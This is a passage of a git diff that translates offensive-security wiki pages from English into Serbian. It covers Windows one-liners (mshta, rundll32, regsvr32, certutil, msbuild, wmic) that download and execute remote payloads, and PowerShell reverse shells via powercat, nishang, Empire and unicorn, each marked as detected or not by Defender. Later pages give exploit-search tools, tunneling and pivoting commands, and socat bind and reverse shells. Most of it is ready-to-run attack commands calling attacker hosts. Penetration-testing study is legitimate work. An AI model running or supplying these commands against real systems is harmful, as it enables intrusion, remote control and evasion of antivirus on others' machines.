([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` - -**Get more info about different Powershell Shells at the end of this document** +**Dobijte više informacija o različitim Powershell Shell-ovima na kraju ovog 
dokumenta** ## Mshta -- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) - +- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) ``` @@ -136,26 +109,22 @@ mshta http://webserver/payload.hta ```bash mshta \\webdavserver\folder\payload.hta ``` - -#### **Example of hta-psh reverse shell (use hta to download and execute PS backdoor)** - +#### **Primer hta-psh reverzne ljuske (koristite hta za preuzimanje i izvršavanje PS backdoora)** ```xml - + ``` +**Možete lako preuzeti i izvršiti Koadic zombija koristeći stager hta** -**You can download & execute very easily a Koadic zombie using the stager hta** - -#### hta example - -[**From here**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) +#### hta primer +[**Odavde**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) ```xml @@ -163,11 +132,9 @@ mshta \\webdavserver\folder\payload.hta ``` - #### **mshta - sct** -[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) - +[**Odavde**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) ```xml @@ -178,14 +145,12 @@ mshta \\webdavserver\folder\payload.hta ``` - #### **Mshta - Metasploit** - ```bash use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 
@@ -196,15 +161,13 @@ msf exploit(windows/misc/hta_server) > exploit ```bash Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit ``` - -**Detected by defender** +**Otkriveno od strane defendera** ## **Rundll32** -[**Dll hello world example**](https://github.com/carterjones/hello-world-dll) - -- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +[**Dll hello world primer**](https://github.com/carterjones/hello-world-dll) +- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash rundll32 \\webdavserver\folder\payload.dll,entrypoint ``` @@ -212,13 +175,11 @@ rundll32 \\webdavserver\folder\payload.dll,entrypoint ```bash rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); ``` - -**Detected by defender** +**Otkriveno od strane defendera** **Rundll32 - sct** -[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) - +[**Odavde**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) ```xml @@ -228,22 +189,18 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http ``` - #### **Rundll32 - Metasploit** - ```bash use windows/smb/smb_delivery run #You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 ``` - **Rundll32 - Koadic** - ```bash use stager/js/rundll32_js set SRVHOST 192.168.1.107 
@@ -252,11 +209,9 @@ run #Koadic will tell you what you need to execute inside the victim, it will be something like: rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); ``` - ## Regsvr32 -- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) - +- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll ``` @@ -264,32 +219,28 @@ regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll ``` regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll ``` - -**Detected by defender** +**Otkriveno od strane defendera** #### Regsvr32 -sct -[**From here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) - +[**Odavde**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) ```markup - ``` - #### **Regsvr32 - Metasploit** - ```bash use multi/script/web_delivery set target 3 
@@ -298,50 +249,38 @@ set lhost 10.2.0.5 run #You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll ``` - -**You can download & execute very easily a Koadic zombie using the stager regsvr** +**Možete lako preuzeti i izvršiti Koadic zombija koristeći stager regsvr** ## Certutil -- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) - -Download a B64dll, decode it and execute it. +- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +Preuzmite B64dll, dekodirajte ga i izvršite. ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll ``` - -Download a B64exe, decode it and execute it. - +Preuzmite B64exe, dekodirajte ga i izvršite. 
```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe ``` - -**Detected by defender** +**Otkriveno od strane defendera** ## **Cscript/Wscript** - ```bash powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" ``` - **Cscript - Metasploit** - ```bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs ``` - -**Detected by defender** +**Otkriveno od strane defendera** ## PS-Bat - ```bash \\webdavserver\folder\batchfile.bat ``` - -Process performing network call: **svchost.exe**\ -Payload written on disk: **WebDAV client local cache** - +Proces koji izvršava mrežni poziv: **svchost.exe**\ +Payload napisan na disku: **WebDAV klijent lokalna keš memorija** ```bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat impacket-smbserver -smb2support kali `pwd` 
@@ -350,102 +289,83 @@ impacket-smbserver -smb2support kali `pwd` ```bash \\10.8.0.3\kali\shell.bat ``` - -**Detected by defender** +**Otkriveno od strane defendera** ## **MSIExec** -Attacker - +Napadač ``` msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi python -m SimpleHTTPServer 80 ``` - -Victim: - +Žrtva: ``` victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi ``` - -**Detected** +**Otkriveno** ## **Wmic** -- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) - +- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash wmic os get /format:"https://webserver/payload.xsl" ``` - -Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): - +Primer xsl fajla [odavde](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): ```xml - - - + + + ``` +**Nije otkriveno** -**Not detected** - -**You can download & execute very easily a Koadic zombie using the stager wmic** +**Možete lako preuzeti i izvršiti Koadic zombija koristeći stager wmic** ## Msbuild -- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) - +- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ``` cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" ``` - -You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions. 
As you will be prompted with a PS shell.\ -Just download this and execute it: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) - +Možete koristiti ovu tehniku da zaobiđete Application Whitelisting i Powershell.exe ograničenja. Bićete upitani sa PS shell-om.\ +Jednostavno preuzmite ovo i izvršite: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj ``` - -**Not detected** +**Nije otkriveno** ## **CSC** -Compile C# code in the victim machine. - +Kompajlirajte C# kod na žrtvenoj mašini. ``` C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs ``` +Možete preuzeti osnovni C# reverse shell odavde: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) -You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) - -**Not deteted** +**Nije otkriveno** ## **Regasm/Regsvc** -- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) - +- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll ``` - -**I haven't tried it** +**Nisam to probao** [**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) ## Odbcconf -- [From 
here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) - +- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} ``` - -**I haven't tried it** +**Nisam to probao** [**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) 
@@ -455,98 +375,82 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) -In the **Shells** folder, there are a lot of different shells. To download and execute Invoke-_PowerShellTcp.ps1_ make a copy of the script and append to the end of the file: - +U **Shells** folderu, postoji mnogo različitih shellova. Da biste preuzeli i izvršili Invoke-_PowerShellTcp.ps1_, napravite kopiju skripte i dodajte na kraj datoteke: ``` Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 ``` - -Start serving the script in a web server and execute it on the victim's end: - +Pokrenite skriptu na veb serveru i izvršite je na strani žrtve: ``` powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" ``` +Defender još uvek ne prepoznaje kao zlonamerni kod (do sada, 3/04/2019). -Defender doesn't detect it as malicious code (yet, 3/04/2019). - -**TODO: Check other nishang shells** +**TODO: Proveriti druge nishang shell-ove** ### **PS-Powercat** [**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) -Download, start a web server, start the listener, and execute it on the victim's end: - +Preuzmite, pokrenite veb server, pokrenite slušalac i izvršite ga na strani žrtve: ``` - powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" ``` +Defender ga ne prepoznaje kao zlonamerni kod (još, 3/04/2019). -Defender doesn't detect it as malicious code (yet, 3/04/2019). - -**Other options offered by powercat:** +**Druge opcije koje nudi powercat:** Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files... 
- ``` Serve a cmd Shell: - powercat -l -p 443 -e cmd +powercat -l -p 443 -e cmd Send a cmd Shell: - powercat -c 10.1.1.1 -p 443 -e cmd +powercat -c 10.1.1.1 -p 443 -e cmd Send a powershell: - powercat -c 10.1.1.1 -p 443 -ep +powercat -c 10.1.1.1 -p 443 -ep Send a powershell UDP: - powercat -c 10.1.1.1 -p 443 -ep -u +powercat -c 10.1.1.1 -p 443 -ep -u TCP Listener to TCP Client Relay: - powercat -l -p 8000 -r tcp:10.1.1.16:443 +powercat -l -p 8000 -r tcp:10.1.1.16:443 Generate a reverse tcp payload which connects back to 10.1.1.15 port 443: - powercat -c 10.1.1.15 -p 443 -e cmd -g +powercat -c 10.1.1.15 -p 443 -e cmd -g Start A Persistent Server That Serves a File: - powercat -l -p 443 -i C:\inputfile -rep +powercat -l -p 443 -i C:\inputfile -rep ``` - ### Empire [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) -Create a powershell launcher, save it in a file and download and execute it. - +Kreirajte powershell launcher, sačuvajte ga u datoteku i preuzmite i izvršite ga. 
``` powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" ``` - -**Detected as malicious code** +**Otkriveno kao zlonamerni kod** ### MSF-Unicorn [https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) -Create a powershell version of metasploit backdoor using unicorn - +Kreirajte powershell verziju metasploit backdoora koristeći unicorn ``` python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 ``` - -Start msfconsole with the created resource: - +Pokrenite msfconsole sa kreiranim resursom: ``` msfconsole -r unicorn.rc ``` - -Start a web server serving the _powershell_attack.txt_ file and execute in the victim: - +Pokrenite web server koji servira _powershell_attack.txt_ datoteku i izvršite na žrtvi: ``` powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" ``` +**Otkriveno kao zlonamerni kod** -**Detected as malicious code** +## Više -## More - -[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console with some offensive PS modules preloaded (cyphered)\ +[PS>Attack](https://github.com/jaredhaight/PSAttack) PS konzola sa nekim ofanzivnim PS modulima unapred učitanim (šifrovano)\ [https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\ -WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive PS modules and proxy detection (IEX) +WinPWN](https://github.com/SecureThisShit/WinPwn) PS konzola sa nekim ofanzivnim PS modulima i detekcijom proksija (IEX) -## References +## Reference - [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) - [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x) diff --git a/src/generic-hacking/search-exploits.md b/src/generic-hacking/search-exploits.md index 8d195840a..5ac2bfb84 100644 --- a/src/generic-hacking/search-exploits.md 
+++ b/src/generic-hacking/search-exploits.md @@ -1,25 +1,16 @@ -# Search Exploits +# Pretraži Eksploite {{#include ../banners/hacktricks-training.md}} -
+### Pregledač -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Uvek pretražujte u "google" ili drugim: **\ \[version] exploit** -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %} - -### Browser - -Always search in "google" or others: **\ \[version] exploit** - -You should also try the **shodan** **exploit search** from [https://exploits.shodan.io/](https://exploits.shodan.io). +Takođe biste trebali probati **shodan** **pretragu eksploita** sa [https://exploits.shodan.io/](https://exploits.shodan.io). ### Searchsploit -Useful to search exploits for services in **exploitdb from the console.** - +Koristan za pretragu eksploita za usluge u **exploitdb iz konzole.** ```bash #Searchsploit tricks searchsploit "linux Kernel" #Example 
@@ -29,43 +20,33 @@ searchsploit -p 7618[.c] #Show complete path searchsploit -x 7618[.c] #Open vi to inspect the exploit searchsploit --nmap file.xml #Search vulns inside an nmap xml result ``` - ### Pompem -[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) is another tool to search for exploits +[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) je još jedan alat za pretragu eksploitacija ### MSF-Search - ```bash msf> search platform:windows port:135 target:XP type:exploit ``` - ### PacketStorm -If nothing is found, try to search the used technology inside [https://packetstormsecurity.com/](https://packetstormsecurity.com) +Ako ništa nije pronađeno, pokušajte da pretražite korišćenu tehnologiju unutar [https://packetstormsecurity.com/](https://packetstormsecurity.com) ### Vulners -You can also search in vulners database: [https://vulners.com/](https://vulners.com) +Takođe možete pretraživati u vulners bazi podataka: [https://vulners.com/](https://vulners.com) ### Sploitus -This searches for exploits in other databases: [https://sploitus.com/](https://sploitus.com) +Ovo pretražuje exploite u drugim bazama podataka: [https://sploitus.com/](https://sploitus.com) ### Sploitify -GTFOBins-like curated list of exploits with filters by vulnerability type (Local Privilege Escalation, Remote Code execution, etc), service type (Web, SMB, SSH, RDP, etc), OS and practice labs (links to machines where you can play with sploits): [https://sploitify.haxx.it](https://sploitify.haxx.it) +GTFOBins-slična kurirana lista exploit-a sa filtrima po tipu ranjivosti (Lokalna eskalacija privilegija, Daljinsko izvršavanje koda, itd), tipu usluge (Web, SMB, SSH, RDP, itd), OS i praktičnim laboratorijama (linkovi ka mašinama gde možete igrati sa exploit-ima): [https://sploitify.haxx.it](https://sploitify.haxx.it) ### search_vulns -search_vulns enables you to search for known vulnerabilities and exploits as well: 
[**https://search-vulns.com/**](https://search-vulns.com/). It utilizes various data sources like the NVD, the Exploit-DB, PoC-in-GitHub, the GitHub Security Advisory database and endoflife.date. +search_vulns vam omogućava da pretražujete poznate ranjivosti i exploite: [**https://search-vulns.com/**](https://search-vulns.com/). Koristi različite izvore podataka kao što su NVD, Exploit-DB, PoC-u-GitHub, GitHub Security Advisory baza podataka i endoflife.date. -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/generic-hacking/tunneling-and-port-forwarding.md b/src/generic-hacking/tunneling-and-port-forwarding.md index 902da0e5b..bee6ba9d6 100644 --- a/src/generic-hacking/tunneling-and-port-forwarding.md +++ b/src/generic-hacking/tunneling-and-port-forwarding.md @@ -5,12 +5,11 @@ ## Nmap tip > [!WARNING] -> **ICMP** and **SYN** scans cannot be tunnelled through socks proxies, so we must **disable ping discovery** (`-Pn`) and specify **TCP scans** (`-sT`) for this to work. +> **ICMP** i **SYN** skeniranja ne mogu se tunelovati kroz socks proksije, pa moramo **onemogućiti ping otkrivanje** (`-Pn`) i odrediti **TCP skeniranja** (`-sT`) da bi ovo radilo. ## **Bash** **Host -> Jump -> InternalA -> InternalB** - ```bash # On the jump server connect the port 3333 to the 5985 mknod backpipe p; @@ -26,19 +25,15 @@ cat <&4 >&3 & # From the host, you can now access InternalB from the Jump server evil-winrm -u username -i Jump ``` - ## **SSH** -SSH graphical connection (X) - +SSH grafička veza (X) ```bash ssh -Y -C @ #-Y is less secure but faster than -X ``` - ### Local Port2Port -Open new Port in SSH Server --> Other port - +Otvorite novi port na SSH serveru --> Drugi port ```bash ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere ``` 
@@ -46,29 +41,23 @@ ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in ```bash ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere ``` - ### Port2Port -Local port --> Compromised host (SSH) --> Third_box:Port - +Lokalni port --> Kompromitovana mašina (SSH) --> Treća_mašina:Port ```bash ssh -i ssh_key @ -L :: [-p ] [-N -f] #This way the terminal is still in your host #Example sudo ssh -L 631::631 -N -f -l ``` - ### Port2hostnet (proxychains) -Local Port --> Compromised host (SSH) --> Wherever - +Lokalni port --> Kompromitovani host (SSH) --> Gde god ```bash ssh -f -N -D @ #All sent to local port will exit through the compromised server (use as proxy) ``` +### Obrnuto prosleđivanje portova -### Reverse Port Forwarding - -This is useful to get reverse shells from internal hosts through a DMZ to your host: - +Ovo je korisno za dobijanje obrnuto shell-ova sa internih hostova kroz DMZ do vašeg hosta: ```bash ssh -i dmz_key -R :443:0.0.0.0:7000 root@10.129.203.111 -vN # Now you can send a rev to dmz_internal_ip:443 and capture it in localhost:7000 @@ -77,13 +66,11 @@ ssh -i dmz_key -R :443:0.0.0.0:7000 root@10.129.203.111 -vN # and change the line "GatewayPorts no" to "GatewayPorts yes" # to be able to make ssh listen in non internal interfaces in the victim (443 in this case) ``` - ### VPN-Tunnel -You need **root in both devices** (as you are going to create new interfaces) and the sshd config has to allow root login:\ +Potrebni su vam **root na oba uređaja** (jer ćete kreirati nove interfejse) i sshd konfiguracija mora dozvoliti root prijavu:\ `PermitRootLogin yes`\ `PermitTunnel yes` - ```bash ssh root@server -w any:any #This will create Tun interfaces in both devices ip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0 #Client side VPN IP 
@@ -91,50 +78,38 @@ ifconfig tun0 up #Activate the client side network interface ip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0 #Server side VPN IP ifconfig tun0 up #Activate the server side network interface ``` - -Enable forwarding on the Server side - +Omogućite prosleđivanje na strani servera ```bash echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE ``` - -Set a new route on the client side - +Postavite novu rutu na klijentskoj strani ``` route add -net 10.0.0.0/16 gw 1.1.1.1 ``` - ## SSHUTTLE -You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host.\ -For example, forwarding all the traffic going to 10.10.10.0/24 - +Možete **tunelovati** putem **ssh** sav **saobraćaj** ka **podmreži** kroz host.\ +Na primer, proslediti sav saobraćaj koji ide ka 10.10.10.0/24 ```bash pip install sshuttle sshuttle -r user@host 10.10.10.10/24 ``` - -Connect with a private key - +Povežite se sa privatnim ključem ```bash sshuttle -D -r user@host 10.10.10.10 0/0 --ssh-cmd 'ssh -i ./id_rsa' # -D : Daemon mode ``` - ## Meterpreter ### Port2Port -Local port --> Compromised host (active session) --> Third_box:Port - +Lokalni port --> Kompromitovani host (aktivna sesija) --> Treća_kutija:Port ```bash # Inside a meterpreter session portfwd add -l -p -r ``` - ### SOCKS - ```bash background# meterpreter session route add # (ex: route add 10.10.10.14 255.255.255.0 8) @@ -142,9 +117,7 @@ use auxiliary/server/socks_proxy run #Proxy port 1080 by default echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains ``` - -Another way: - +Još jedan način: ```bash background #meterpreter session use post/multi/manage/autoroute 
@@ -157,13 +130,11 @@ set VERSION 4a run #Proxy port 1080 by default echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains ``` - ## Cobalt Strike ### SOCKS proxy -Open a port in the teamserver listening in all the interfaces that can be used to **route the traffic through the beacon**. - +Otvorite port na teamserveru koji sluša na svim interfejsima koji se mogu koristiti za **usmeravanje saobraćaja kroz beacon**. ```bash beacon> socks 1080 [+] started SOCKS4a server on: 1080 
@@ -171,50 +142,42 @@ beacon> socks 1080 # Set port 1080 as proxy server in proxychains.conf proxychains nmap -n -Pn -sT -p445,3389,5985 10.10.17.25 ``` - ### rPort2Port > [!WARNING] -> In this case, the **port is opened in the beacon host**, not in the Team Server and the traffic is sent to the Team Server and from there to the indicated host:port - +> U ovom slučaju, **port je otvoren na beacon hostu**, a ne na Team Serveru, a saobraćaj se šalje na Team Server i odatle na navedeni host:port ```bash rportfwd [bind port] [forward host] [forward port] rportfwd stop [bind port] ``` +Da se napomene: -To note: +- Beaconov obrnuti port forwarding je dizajniran da **tuneluje saobraćaj ka Team Server-u, a ne za preusmeravanje između pojedinačnih mašina**. +- Saobraćaj je **tunelovan unutar Beaconovog C2 saobraćaja**, uključujući P2P linkove. +- **Administratorske privilegije nisu potrebne** za kreiranje obrnuti port forward-a na visokim portovima. -- Beacon's reverse port forward is designed to **tunnel traffic to the Team Server, not for relaying between individual machines**. -- Traffic is **tunneled within Beacon's C2 traffic**, including P2P links. -- **Admin privileges are not required** to create reverse port forwards on high ports. 
- -### rPort2Port local +### rPort2Port lokalno > [!WARNING] -> In this case, the **port is opened in the beacon host**, not in the Team Server and the **traffic is sent to the Cobalt Strike client** (not to the Team Server) and from there to the indicated host:port - +> U ovom slučaju, **port je otvoren na beacon host-u**, a ne na Team Server-u i **saobraćaj se šalje Cobalt Strike klijentu** (ne na Team Server) i odatle na navedeni host:port ``` rportfwd_local [bind port] [forward host] [forward port] rportfwd_local stop [bind port] ``` - ## reGeorg [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg) -You need to upload a web file tunnel: ashx|aspx|js|jsp|php|php|jsp - +Morate da otpremite web fajl tunel: ashx|aspx|js|jsp|php|php|jsp ```bash python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp ``` - ## Chisel -You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\ -You need to use the **same version for client and server** +Možete ga preuzeti sa stranice za izdanja [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\ +Morate koristiti **istu verziju za klijenta i server** ### socks - ```bash ./chisel server -p 8080 --reverse #Server -- Attacker ./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim 
@@ -223,22 +186,18 @@ You need to use the **same version for client and server** ./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed) ./chisel client -v 10.10.10.10:8080 socks #Attacker ``` - -### Port forwarding - +### Prosleđivanje portova ```bash ./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim ``` - ## Ligolo-ng [https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng) -**Use the same version for agent and proxy** +**Koristite istu verziju za agenta i proxy** ### Tunneling - ```bash # Start proxy server and automatically generate self-signed TLS certificates -- Attacker sudo ./proxy -selfcert @@ -260,9 +219,7 @@ interface_add_route --name "ligolo" --route / python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080 ``` @@ -293,9 +246,7 @@ attacker> python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127 ```bash victim> python client.py --server-ip --server-port 9999 ``` - -Pivot through **NTLM proxy** - +Pivotiranje kroz **NTLM proxy** ```bash victim> python client.py --server-ip --server-port 9999 --ntlm-proxy-ip --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --password P@ssw0rd ``` 
@@ -303,39 +254,29 @@ victim> python client.py --server-ip --server-port 9999 --ntl ```bash victim> python client.py --server-ip --server-port 9999 --ntlm-proxy-ip --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45 ``` - ## **Socat** [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) ### Bind shell - ```bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane attacker> socat FILE:`tty`,raw,echo=0 TCP4::1337 ``` - -### Reverse shell - +### Obrnuta ljuska ```bash attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane ``` - ### Port2Port - ```bash socat TCP4-LISTEN:,fork TCP4:: & ``` - -### Port2Port through socks - +### Port2Port preko socks ```bash socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 ``` - -### Meterpreter through SSL Socat - +### Meterpreter preko SSL Socat ```bash #Create meterpreter backdoor to port 3333 and start msfconsole listener in that port attacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333 
